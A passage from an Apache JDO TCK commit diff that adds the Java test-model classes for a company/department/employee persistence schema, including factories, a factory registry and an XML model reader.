*/ + public int hashCode() { + return (int)companyid; + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( companyid < other.companyid ) return -1; + if( companyid > other.companyid ) return 1; + return 0; + } + + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactory.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactory.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactory.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactory.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,45 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +/* + * CompanyFactory.java + * + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.math.BigDecimal; + +import java.util.Date; + +/** + * This interface is implemented by a factory class that can create + * Company model instances. The factory instance is registered with + * CompanyFactoryRegistry. + */ +public interface CompanyFactory { + ICompany newCompany(long companyid, String name, Date founded); + IDepartment newDepartment(long deptid, String name); + IDepartment newDepartment(long deptid, + String name, ICompany company); + IFullTimeEmployee newFullTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, double sal); + IPartTimeEmployee newPartTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, double wage); + Class[] getTearDownClasses(); +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryAbstractImpl.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryAbstractImpl.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryAbstractImpl.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryAbstractImpl.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,109 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import javax.jdo.PersistenceManager; + +import org.apache.commons.logging.Log; +import org.apache.commons.logging.LogFactory; + +/* + * This class provides an implementation of CompanyFactory that sets all + * of the properties of the instance and defines abstract methods to + * construct the instance itself. It is intended to be subclassed by + * classes that implement only the methods to construct the instance. + */ +public abstract class CompanyFactoryAbstractImpl implements CompanyFactory { + + protected PersistenceManager pm; + + /** Logger */ + protected Log logger = + LogFactory.getFactory().getInstance("org.apache.jdo.tck"); + + /** true if debug logging is enabled. */ + protected boolean debug = logger.isDebugEnabled(); + + /** Creates a new instance of CompanyFactoryAbstractImpl */ + public CompanyFactoryAbstractImpl(PersistenceManager pm) { + this.pm = pm; + } + + abstract ICompany newCompany(); + abstract IDepartment newDepartment(); + abstract IFullTimeEmployee newFullTimeEmployee(); + abstract IPartTimeEmployee newPartTimeEmployee(); + + public ICompany newCompany(long companyid, String name, + java.util.Date founded) { + ICompany result = newCompany(); + if (debug) logger.debug("newCompany returned" + result); + result.setCompanyid(companyid); + result.setName(name); + result.setFounded(founded); + return result; + } + + public IDepartment newDepartment(long deptid, String name) { + IDepartment result = newDepartment(); + if (debug) logger.debug("newDepartment returned" + result); + result.setDeptid(deptid); + result.setName(name); + return result; + } + + + public IDepartment newDepartment(long deptid, String name, ICompany company) { + IDepartment result = newDepartment(); + if (debug) logger.debug("newDepartment returned" + result); + result.setDeptid(deptid); + result.setName(name); + result.setCompany(company); + return result; + } + + public IFullTimeEmployee newFullTimeEmployee(long personid, String first, + String last, String middle, java.util.Date born, + java.util.Date hired, double sal) { + IFullTimeEmployee result = newFullTimeEmployee(); + if (debug) logger.debug("newFullTimeEmployee returned" + result); + result.setPersonid(personid); + result.setFirstname(first); + result.setLastname(last); + result.setMiddlename(middle); + result.setBirthdate(born); + result.setHiredate(hired); + result.setSalary(sal); + return result; + } + + public IPartTimeEmployee newPartTimeEmployee(long personid, String first, + String last, String middle, java.util.Date born, + java.util.Date hired, double wage) { + IPartTimeEmployee result = newPartTimeEmployee(); + if (debug) logger.debug("newPartTimeEmployee returned" + result); + result.setPersonid(personid); + result.setFirstname(first); + result.setLastname(last); + result.setMiddlename(middle); + result.setBirthdate(born); + result.setHiredate(hired); + result.setWage(wage); + return result; + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryConcreteClass.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryConcreteClass.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryConcreteClass.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryConcreteClass.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,81 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.math.BigDecimal; + +import java.util.Date; + +import javax.jdo.PersistenceManager; + +/* + * This class is the company factory that uses constructors of the + * concrete classes. + */ +public class CompanyFactoryConcreteClass implements CompanyFactory { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + PartTimeEmployee.class, FullTimeEmployee.class, + Department.class, Company.class + }; + + public CompanyFactoryConcreteClass(PersistenceManager pm) { + } + + public CompanyFactoryConcreteClass() { + } + + public ICompany newCompany(long companyid, + String name, Date founded) { + return new Company(companyid, name, founded); + } + + public IDepartment newDepartment(long deptid, String name) { + return new Department(deptid, name); + } + + public IDepartment newDepartment(long deptid, + String name, ICompany company) { + return new Department(deptid, name, company); + } + + public IFullTimeEmployee newFullTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, double sal) { + return new FullTimeEmployee(personid, first, last, middle, + born, hired, sal); + } + + public IPartTimeEmployee newPartTimeEmployee(long personid, + String first, String last, String middle, + Date born, Date hired, double wage) { + return new PartTimeEmployee(personid, first, last, middle, + born, hired, wage); + } + + public IPerson newPerson(long personid, + String firstname, String lastname, String middlename, + Date birthdate) { + return new Person(personid, firstname, lastname, middlename, + birthdate); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMClass.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMClass.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMClass.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMClass.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,62 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import javax.jdo.PersistenceManager; + +/* + * CompanyFactoryPMInterface.java + * + * This class uses the PersistenceManager.newInstance method with the concrete + * class as a parameter. + */ +public class CompanyFactoryPMClass + extends CompanyFactoryAbstractImpl { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + PartTimeEmployee.class, FullTimeEmployee.class, + Department.class, Company.class + }; + + /** + * Creates a new instance of CompanyFactoryPMClass + */ + public CompanyFactoryPMClass(PersistenceManager pm) { + super(pm); + } + + ICompany newCompany() { + return (ICompany)pm.newInstance(Company.class); + } + + IDepartment newDepartment() { + return (IDepartment)pm.newInstance(Department.class); + } + + IFullTimeEmployee newFullTimeEmployee() { + return (IFullTimeEmployee)pm.newInstance(FullTimeEmployee.class); + } + + IPartTimeEmployee newPartTimeEmployee() { + return (IPartTimeEmployee)pm.newInstance(PartTimeEmployee.class); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMInterface.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMInterface.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMInterface.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryPMInterface.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,62 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import javax.jdo.PersistenceManager; + +/* + * CompanyFactoryPMInterface.java + * + * Created on August 29, 2005, 9:56 PM + * + */ +public class CompanyFactoryPMInterface + extends CompanyFactoryAbstractImpl { + + /** */ + public static final Class[] tearDownClasses = new Class[] { + IPartTimeEmployee.class, IFullTimeEmployee.class, + IDepartment.class, ICompany.class + }; + + /** + * Creates a new instance of CompanyFactoryPMInterface + */ + public CompanyFactoryPMInterface(PersistenceManager pm) { + super(pm); + } + + ICompany newCompany() { + return (ICompany)pm.newInstance(ICompany.class); + } + + IDepartment newDepartment() { + return (IDepartment)pm.newInstance(IDepartment.class); + } + + IFullTimeEmployee newFullTimeEmployee() { + return (IFullTimeEmployee)pm.newInstance(IFullTimeEmployee.class); + } + + IPartTimeEmployee newPartTimeEmployee() { + return (IPartTimeEmployee)pm.newInstance(IPartTimeEmployee.class); + } + + public Class[] getTearDownClasses() { + return tearDownClasses; + } +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryRegistry.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryRegistry.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryRegistry.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyFactoryRegistry.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,139 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.lang.reflect.Constructor; + +import java.math.BigDecimal; + +import java.util.Date; + +import javax.jdo.PersistenceManager; + +/* + * This is the registry for company factories. It is used for the + * CompletenessTest to create instances from input xml test data files. + * Factory instances that implement CompanyFactory interface are + * registered (using the singleton pattern). + * <P>Several registration methods are available. The default factory, + * which creates instances by construction, is automatically + * registered during class initialization. The default factory can + * also be registered by using the no-args method registerFactory(). + * <P>Non-default factories can be registered using the registerFactory + * method taking the factory as an argument. Non-default factories that + * have a single constructor argument PersistenceManager can be + * registered using either the method that explicitly names the class, + * or with the method that takes the class name from a system property. + */ +public class CompanyFactoryRegistry { + + /** The system property for factory name + */ + final static String FACTORY_PROPERTY_NAME = + "jdo.tck.mapping.companyfactory"; + + /** The factory name if the system property is not set. + */ + final static String DEFAULT_FACTORY_CLASS_NAME = + "org.apache.jdo.tck.pc.company.CompanyFactoryConcreteClass"; + + /** + * The default factory class name + */ + final static String FACTORY_CLASS_NAME; + + static { + String prop = System.getProperty(FACTORY_PROPERTY_NAME); + if ((prop == null) || (prop.length() == 0)) + prop = DEFAULT_FACTORY_CLASS_NAME; + FACTORY_CLASS_NAME = prop; + } + + /** + * This is the default company factory singleton. This is statically + * loaded regardless of the setting of the system property. + */ + final static CompanyFactory SINGLETON = new CompanyFactoryConcreteClass(); + + /** + * This is the currently registered factory. + */ + static CompanyFactory instance = SINGLETON; + + /** + * Creates a new instance of CompanyFactoryRegistry + */ + private CompanyFactoryRegistry() { + } + + /** + * Get the currently registered factory. + * @return the factory + */ + public static CompanyFactory getInstance() { + return instance; + } + + /** Register the default factory. + */ + public static void registerFactory() { + instance = SINGLETON; + } + + /** Register a factory using the default factory name from the + * system property. The factory must be available in the current + * class path and have a public constructor + * taking a PersistenceManager as a parameter. + * @param pm the PersistenceManager + */ + public static void registerFactory(PersistenceManager pm) { + registerFactory(FACTORY_CLASS_NAME, pm); + } + + /** Register a factory using the specified factoryName + * parameter. The factory class must be loadable by the current context + * classloader and have a public constructor + * taking a PersistenceManager as a parameter. + * @param factoryClassName the fully-qualified class name of the factory + * @param pm the PersistenceManager + */ + public static void registerFactory(String factoryClassName, + PersistenceManager pm) { + CompanyFactory factory = null; + try { + if (factoryClassName != null) { + Class factoryClass = Class.forName(factoryClassName); + Constructor ctor = factoryClass.getConstructor(new Class[] + {PersistenceManager.class}); + factory = (CompanyFactory) + ctor.newInstance(new Object[]{pm}); + } + registerFactory(factory); + } catch (Exception ex) { + throw new RuntimeException ("Unable to construct CompanyFactory " + + factoryClassName, ex); + } + } + + /** Register the factory. + * @param factory the factory + */ + public static void registerFactory(CompanyFactory factory) { + instance = factory!=null?factory:SINGLETON; + } + +} Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyModelReader.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyModelReader.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyModelReader.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/CompanyModelReader.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,196 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.io.InputStream; +import java.text.SimpleDateFormat; +import java.util.Date; +import java.util.List; +import java.util.Locale; +import java.util.TimeZone; + +import org.apache.jdo.tck.util.ConversionHelper; +import org.springframework.beans.factory.xml.XmlBeanFactory; +import org.springframework.beans.propertyeditors.CustomDateEditor; +import org.springframework.core.io.ClassPathResource; +import org.springframework.core.io.InputStreamResource; + +/** + * Utility class to create a graph of company model instances from an xml + * representation. + * + * @author Michael Bouschen + */ +public class CompanyModelReader extends XmlBeanFactory { + + /** The format of date values in the xml representation */ + public static final String DATE_PATTERN = "d/MMM/yyyy"; + + /** The name of the root list bean. */ + public static final String ROOT_LIST_NAME = "root"; + + /** The bean-factory name in the xml input files. + */ + public static final String BEAN_FACTORY_NAME = "companyFactory"; + + /** The company factory instance. */ + private CompanyFactory companyFactory; + + /** + * Create a CompanyModelReader for the specified resourceName. + * @param resourceName the name of the resource + */ + public CompanyModelReader(String resourceName) { + // Use the class loader of the Company class to find the resource + this(resourceName, Company.class.getClassLoader()); + } + + /** + * Create a CompanyModelReader for the specified resourceName. + * @param resourceName the name of the resource + */ + public CompanyModelReader(String resourceName, ClassLoader classLoader) { + super(new ClassPathResource(resourceName, classLoader)); + configureFactory(); + } + + /** + * Create a CompanyModelReader for the specified InputStream. + * @param stream the input stream + */ + public CompanyModelReader(InputStream stream) { + super(new InputStreamResource(stream)); + configureFactory(); + } + + /** + * Returns a list of root objects. The method expects to find a bean + * called "root" of type list in the xml and returns it. + * @return a list of root instances + */ + public List getRootList() { + return (List)getBean(ROOT_LIST_NAME); + } + + /** + * Configure the CompanyModelReader, e.g. register CustomEditor classes + * to convert the string representation of a property into an instance + * of the right type. + */ + private void configureFactory() { + SimpleDateFormat formatter = new SimpleDateFormat(DATE_PATTERN, Locale.US); + formatter.setTimeZone(TimeZone.getTimeZone("America/New_York")); + CustomDateEditor dateEditor = + new CustomDateEditor(formatter, true); + registerCustomEditor(Date.class, dateEditor); + companyFactory = CompanyFactoryRegistry.getInstance(); + addSingleton(BEAN_FACTORY_NAME, companyFactory); + } + + // Convenience methods + + /** + * Convenience method returning a Company instance for the specified + * name. The method returns <code>null</code> if there is no Company + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Company bean. + */ + public Company getCompany(String name) { + return (Company)getBean(name, Company.class); + } + + /** + * Convenience method returning a Department instance for the specified + * name. The method returns <code>null</code> if there is no Department + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Department bean. + */ + public Department getDepartment(String name) { + return (Department)getBean(name, Department.class); + } + + /** + * Convenience method returning an Employee instance for the specified + * name. The method returns <code>null</code> if there is no Employee + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Employee bean. + */ + public Employee getEmployee(String name) { + return (Employee)getBean(name, Employee.class); + } + + /** + * Convenience method returning a FullTimeEmployee instance for the + * specified name. The method returns <code>null</code> if there is no + * FullTimeEmployee bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * FullTimeEmployee bean. + */ + public FullTimeEmployee getFullTimeEmployee(String name) { + return (FullTimeEmployee)getBean(name, FullTimeEmployee.class); + } + + /** + * Convenience method returning a PartTimeEmployee instance for the + * specified name. The method returns <code>null</code> if there is no + * PartTimeEmployee bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * PartTimeEmployee bean. + */ + public PartTimeEmployee getPartTimeEmployee(String name) { + return (PartTimeEmployee)getBean(name, PartTimeEmployee.class); + } + + /** + * Convenience method returning a Person instance for the specified + * name. The method returns <code>null</code> if there is no Person + * bean with the specified name. + * @param name the name of the bean to return. + * @return the instance of the bean or <code>null</code> if there no + * Person bean. + */ + public Person getPerson(String name) { + return (Person)getBean(name, Person.class); + } + + /** + * @return Returns the tearDownClasses. + */ + public Class[] getTearDownClassesFromFactory() { + return companyFactory.getTearDownClasses(); + } + + /** + * @return Returns the tearDownClasses. + */ + public static Class[] getTearDownClasses() { + return CompanyFactoryConcreteClass.tearDownClasses; + } + + public static Date stringToUtilDate(String value) { + return ConversionHelper.toUtilDate(DATE_PATTERN, "America/New_York", Locale.US, value); + } +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Department.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,341 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.io.Serializable; +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.util.Collections; +import java.util.Comparator; +import java.util.List; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents a department within a company. + */ +public class Department + implements IDepartment, Serializable, Comparable, Comparator, DeepEquality { + + public static final int RECOMMENDED_NO_OF_EMPS = 2; + + private long deptid; + private String name; + private Company company; + private List employees; + + /** This is the JDO-required no-args constructor. The TCK relies on + * this constructor for testing PersistenceManager.newInstance(PCClass). + */ + public Department() {} + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + */ + public Department(long deptid, String name) { + this.deptid = deptid; + this.name = name; + } + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + * @param company The company that the department is associated with. + */ + public Department(long deptid, String name, ICompany company) { + this.deptid = deptid; + this.name = name; + this.company = (Company)company; + } + + /** + * Construct a <code>Department</code> instance. + * @param deptid The department id. + * @param name The name of the department. + * @param company The company that the department is associated with. + * @param employees List of employees + */ + public Department(long deptid, String name, Company company, + List employees) { + this.deptid = deptid; + this.name = name; + this.company = (Company)company; + this.employees = employees; + } + + /** + * Set the id associated with this object. + * @param id the id. + */ + public void setDeptid(long id) { + if (this.deptid != 0) + throw new IllegalStateException("Id is already set."); + this.deptid = id; + } + + /** + * Get the department id. + * @return The department id. + */ + public long getDeptid() { + return deptid; + } + + /** + * Get the name of the department. + * @return The name of the department. + */ + public String getName() { + return name; + } + + /** + * Set the name of the department. + * @param name The name to set for the department. + */ + public void setName(String name) { + this.name = name; + } + + /** + * Get the company associated with the department. + * @return The company. + */ + public ICompany getCompany() { + return company; + } + + /** + * Set the company for the department. + * @param company The company to associate with the department. + */ + public void setCompany(ICompany company) { + this.company = (Company)company; + } + + /** + * Get the employees in the department as an unmodifiable set. + ******************* FIX?? + * @return The set of employees in the department, as an unmodifiable + * set. + */ + public List getEmployees() { + return employees; + } + + /** + * Add an employee to the department. + * @param emp The employee to add to the department. + */ + public void addEmployee(Employee emp) { + employees.add(emp); + } + + /** + * Remove an employee from the department. + * @param emp The employee to remove from the department. + */ + public void removeEmployee(int index) { + employees.remove(index); + } + + /** + * Set the employees to be in this department. + * @param employees The employees for this department. + */ + public void setEmployees(List employees) { + this.employees = employees; + } + + /** + * Returns <code>true</code> if all the fields of this instance are + * deep equal to the coresponding fields of the other Department. + * @param other the object with which to compare. + * @param helper EqualityHelper to keep track of instances that have + * already been processed. + * @return <code>true</code> if all the fields are deep equal; + * <code>false</code> otherwise. + * @throws ClassCastException if the specified instances' type prevents + * it from being compared to this instance. + */ + public boolean deepCompareFields(Object other, + EqualityHelper helper) { + IDepartment otherDept = (IDepartment)other; + String where = "Department<" + deptid + ">"; + return + helper.equals(deptid, otherDept.getDeptid(), where + ".deptid") & + helper.equals(name, otherDept.getName(), where + ".name") & + helper.deepEquals(employees, otherDept.getEmployees(), where + ".employees") & + helper.deepEquals(company, otherDept.getCompany(), where + ".company") ; + } + + /** + * Returns a String representation of a <code>Department</code> object. + * @return a String representation of a <code>Department</code> object. + */ + public String toString() { + return "Department(" + getFieldRepr()+ ")"; + } + + /** + * Returns a String representation of the non-relationship fields. + * @return a String representation of the non-relationship fields. + */ + protected String getFieldRepr() { + StringBuffer rc = new StringBuffer(); + rc.append(deptid); + rc.append(", name ").append(name); + return rc.toString(); + } + + /** + * Compares this object with the specified object for order. Returns a + * negative integer, zero, or a positive integer as this object is less + * than, equal to, or greater than the specified object. + * @param o The Object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified object. + * @throws ClassCastException - if the specified object's type prevents + * it from being compared to this Object. + */ + public int compareTo(Object o) { + return compareTo((IDepartment)o); + } + + /** + * Compare two instances. This is a method in Comparator. + */ + public int compare(Object o1, Object o2) { + return compare((IDepartment)o1, (IDepartment)o2); + } + + /** + * Compares this object with the specified Department object for + * order. Returns a negative integer, zero, or a positive integer as + * this object is less than, equal to, or greater than the specified + * object. + * @param other The Department object to be compared. + * @return a negative integer, zero, or a positive integer as this + * object is less than, equal to, or greater than the specified + * Department object. + */ + public int compareTo(IDepartment other) { + return compare(this, other); + } + + /** + * Compares its two IDepartment arguments for order. Returns a negative + * integer, zero, or a positive integer as the first argument is less + * than, equal to, or greater than the second. + * @param o1 the first IDepartment object to be compared. + * @param o2 the second IDepartment object to be compared. + * @return a negative integer, zero, or a positive integer as the first + * object is less than, equal to, or greater than the second object. + */ + public static int compare(IDepartment o1, IDepartment o2) { + return EqualityHelper.compare(o1.getDeptid(), o2.getDeptid()); + } + + /** + * Indicates whether some other object is "equal to" this one. + * @param obj the object with which to compare. + * @return <code>true</code> if this object is the same as the obj + * argument; <code>false</code> otherwise. + */ + public boolean equals(Object obj) { + if (obj instanceof IDepartment) { + return compareTo((IDepartment)obj) == 0; + } + return false; + } + + /** + * Returns a hash code value for the object. + * @return a hash code value for this object. + */ + public int hashCode() { + return (int)deptid; + } + + /** + * The application identity class associated with the + * <code>Department</code> class. + */ + public static class Oid implements Serializable, Comparable { + + /** + * This field represents the application identifier field + * for the <code>Department</code> class. + * It must match in name and type with the field in the + * <code>Department</code> class. + */ + public long deptid; + + /** + * The required public, no-arg constructor. + */ + public Oid() { } + + /** + * A constructor to initialize the identifier field. + * @param deptid the deptid of the Department. + */ + public Oid(long deptid) { + this.deptid = deptid; + } + + public Oid(String s) { deptid = Long.parseLong(justTheId(s)); } + + public String toString() { return this.getClass().getName() + ": " + deptid;} + + + /** */ + public boolean equals(java.lang.Object obj) { + if( obj==null || !this.getClass().equals(obj.getClass()) ) + return( false ); + Oid o = (Oid) obj; + if( this.deptid != o.deptid ) return( false ); + return( true ); + } + + /** */ + public int hashCode() { + return( (int) deptid ); + } + + protected static String justTheId(String str) { + return str.substring(str.indexOf(':') + 1); + } + + /** */ + public int compareTo(Object obj) { + // may throw ClassCastException which the user must handle + Oid other = (Oid) obj; + if( deptid < other.deptid ) return -1; + if( deptid > other.deptid ) return 1; + return 0; + } + + } + +} + Added: db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java URL: http://svn.apache.org/viewvc/db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java?view=auto&rev=447999 ============================================================================== --- db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java (added) +++ db/jdo/trunk/tck20/src/java/org/apache/jdo/tck/pc/companyListWithoutJoin/Employee.java Tue Sep 19 15:29:56 2006 @@ -0,0 +1,335 @@ +/* + * Copyright 2005 The Apache Software Foundation. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package org.apache.jdo.tck.pc.companyListWithoutJoin; + +import java.io.ObjectInputStream; +import java.io.IOException; + +import java.util.Collections; +import java.util.Date; +import java.util.HashSet; +import java.util.Set; + +import org.apache.jdo.tck.util.DeepEquality; +import org.apache.jdo.tck.util.EqualityHelper; + +/** + * This class represents an employee. + */ +public abstract class Employee extends Person implements IEmployee { + + private Date hiredate; + private double weeklyhours; + private Department department; + private Department fundingDept; + private Employee manager; + private Employee mentor; + private Employee protege; + private Employee hradvisor; + private transient Set team = new HashSet(); // element-type is Employee + private transient Set hradvisees = new HashSet(); 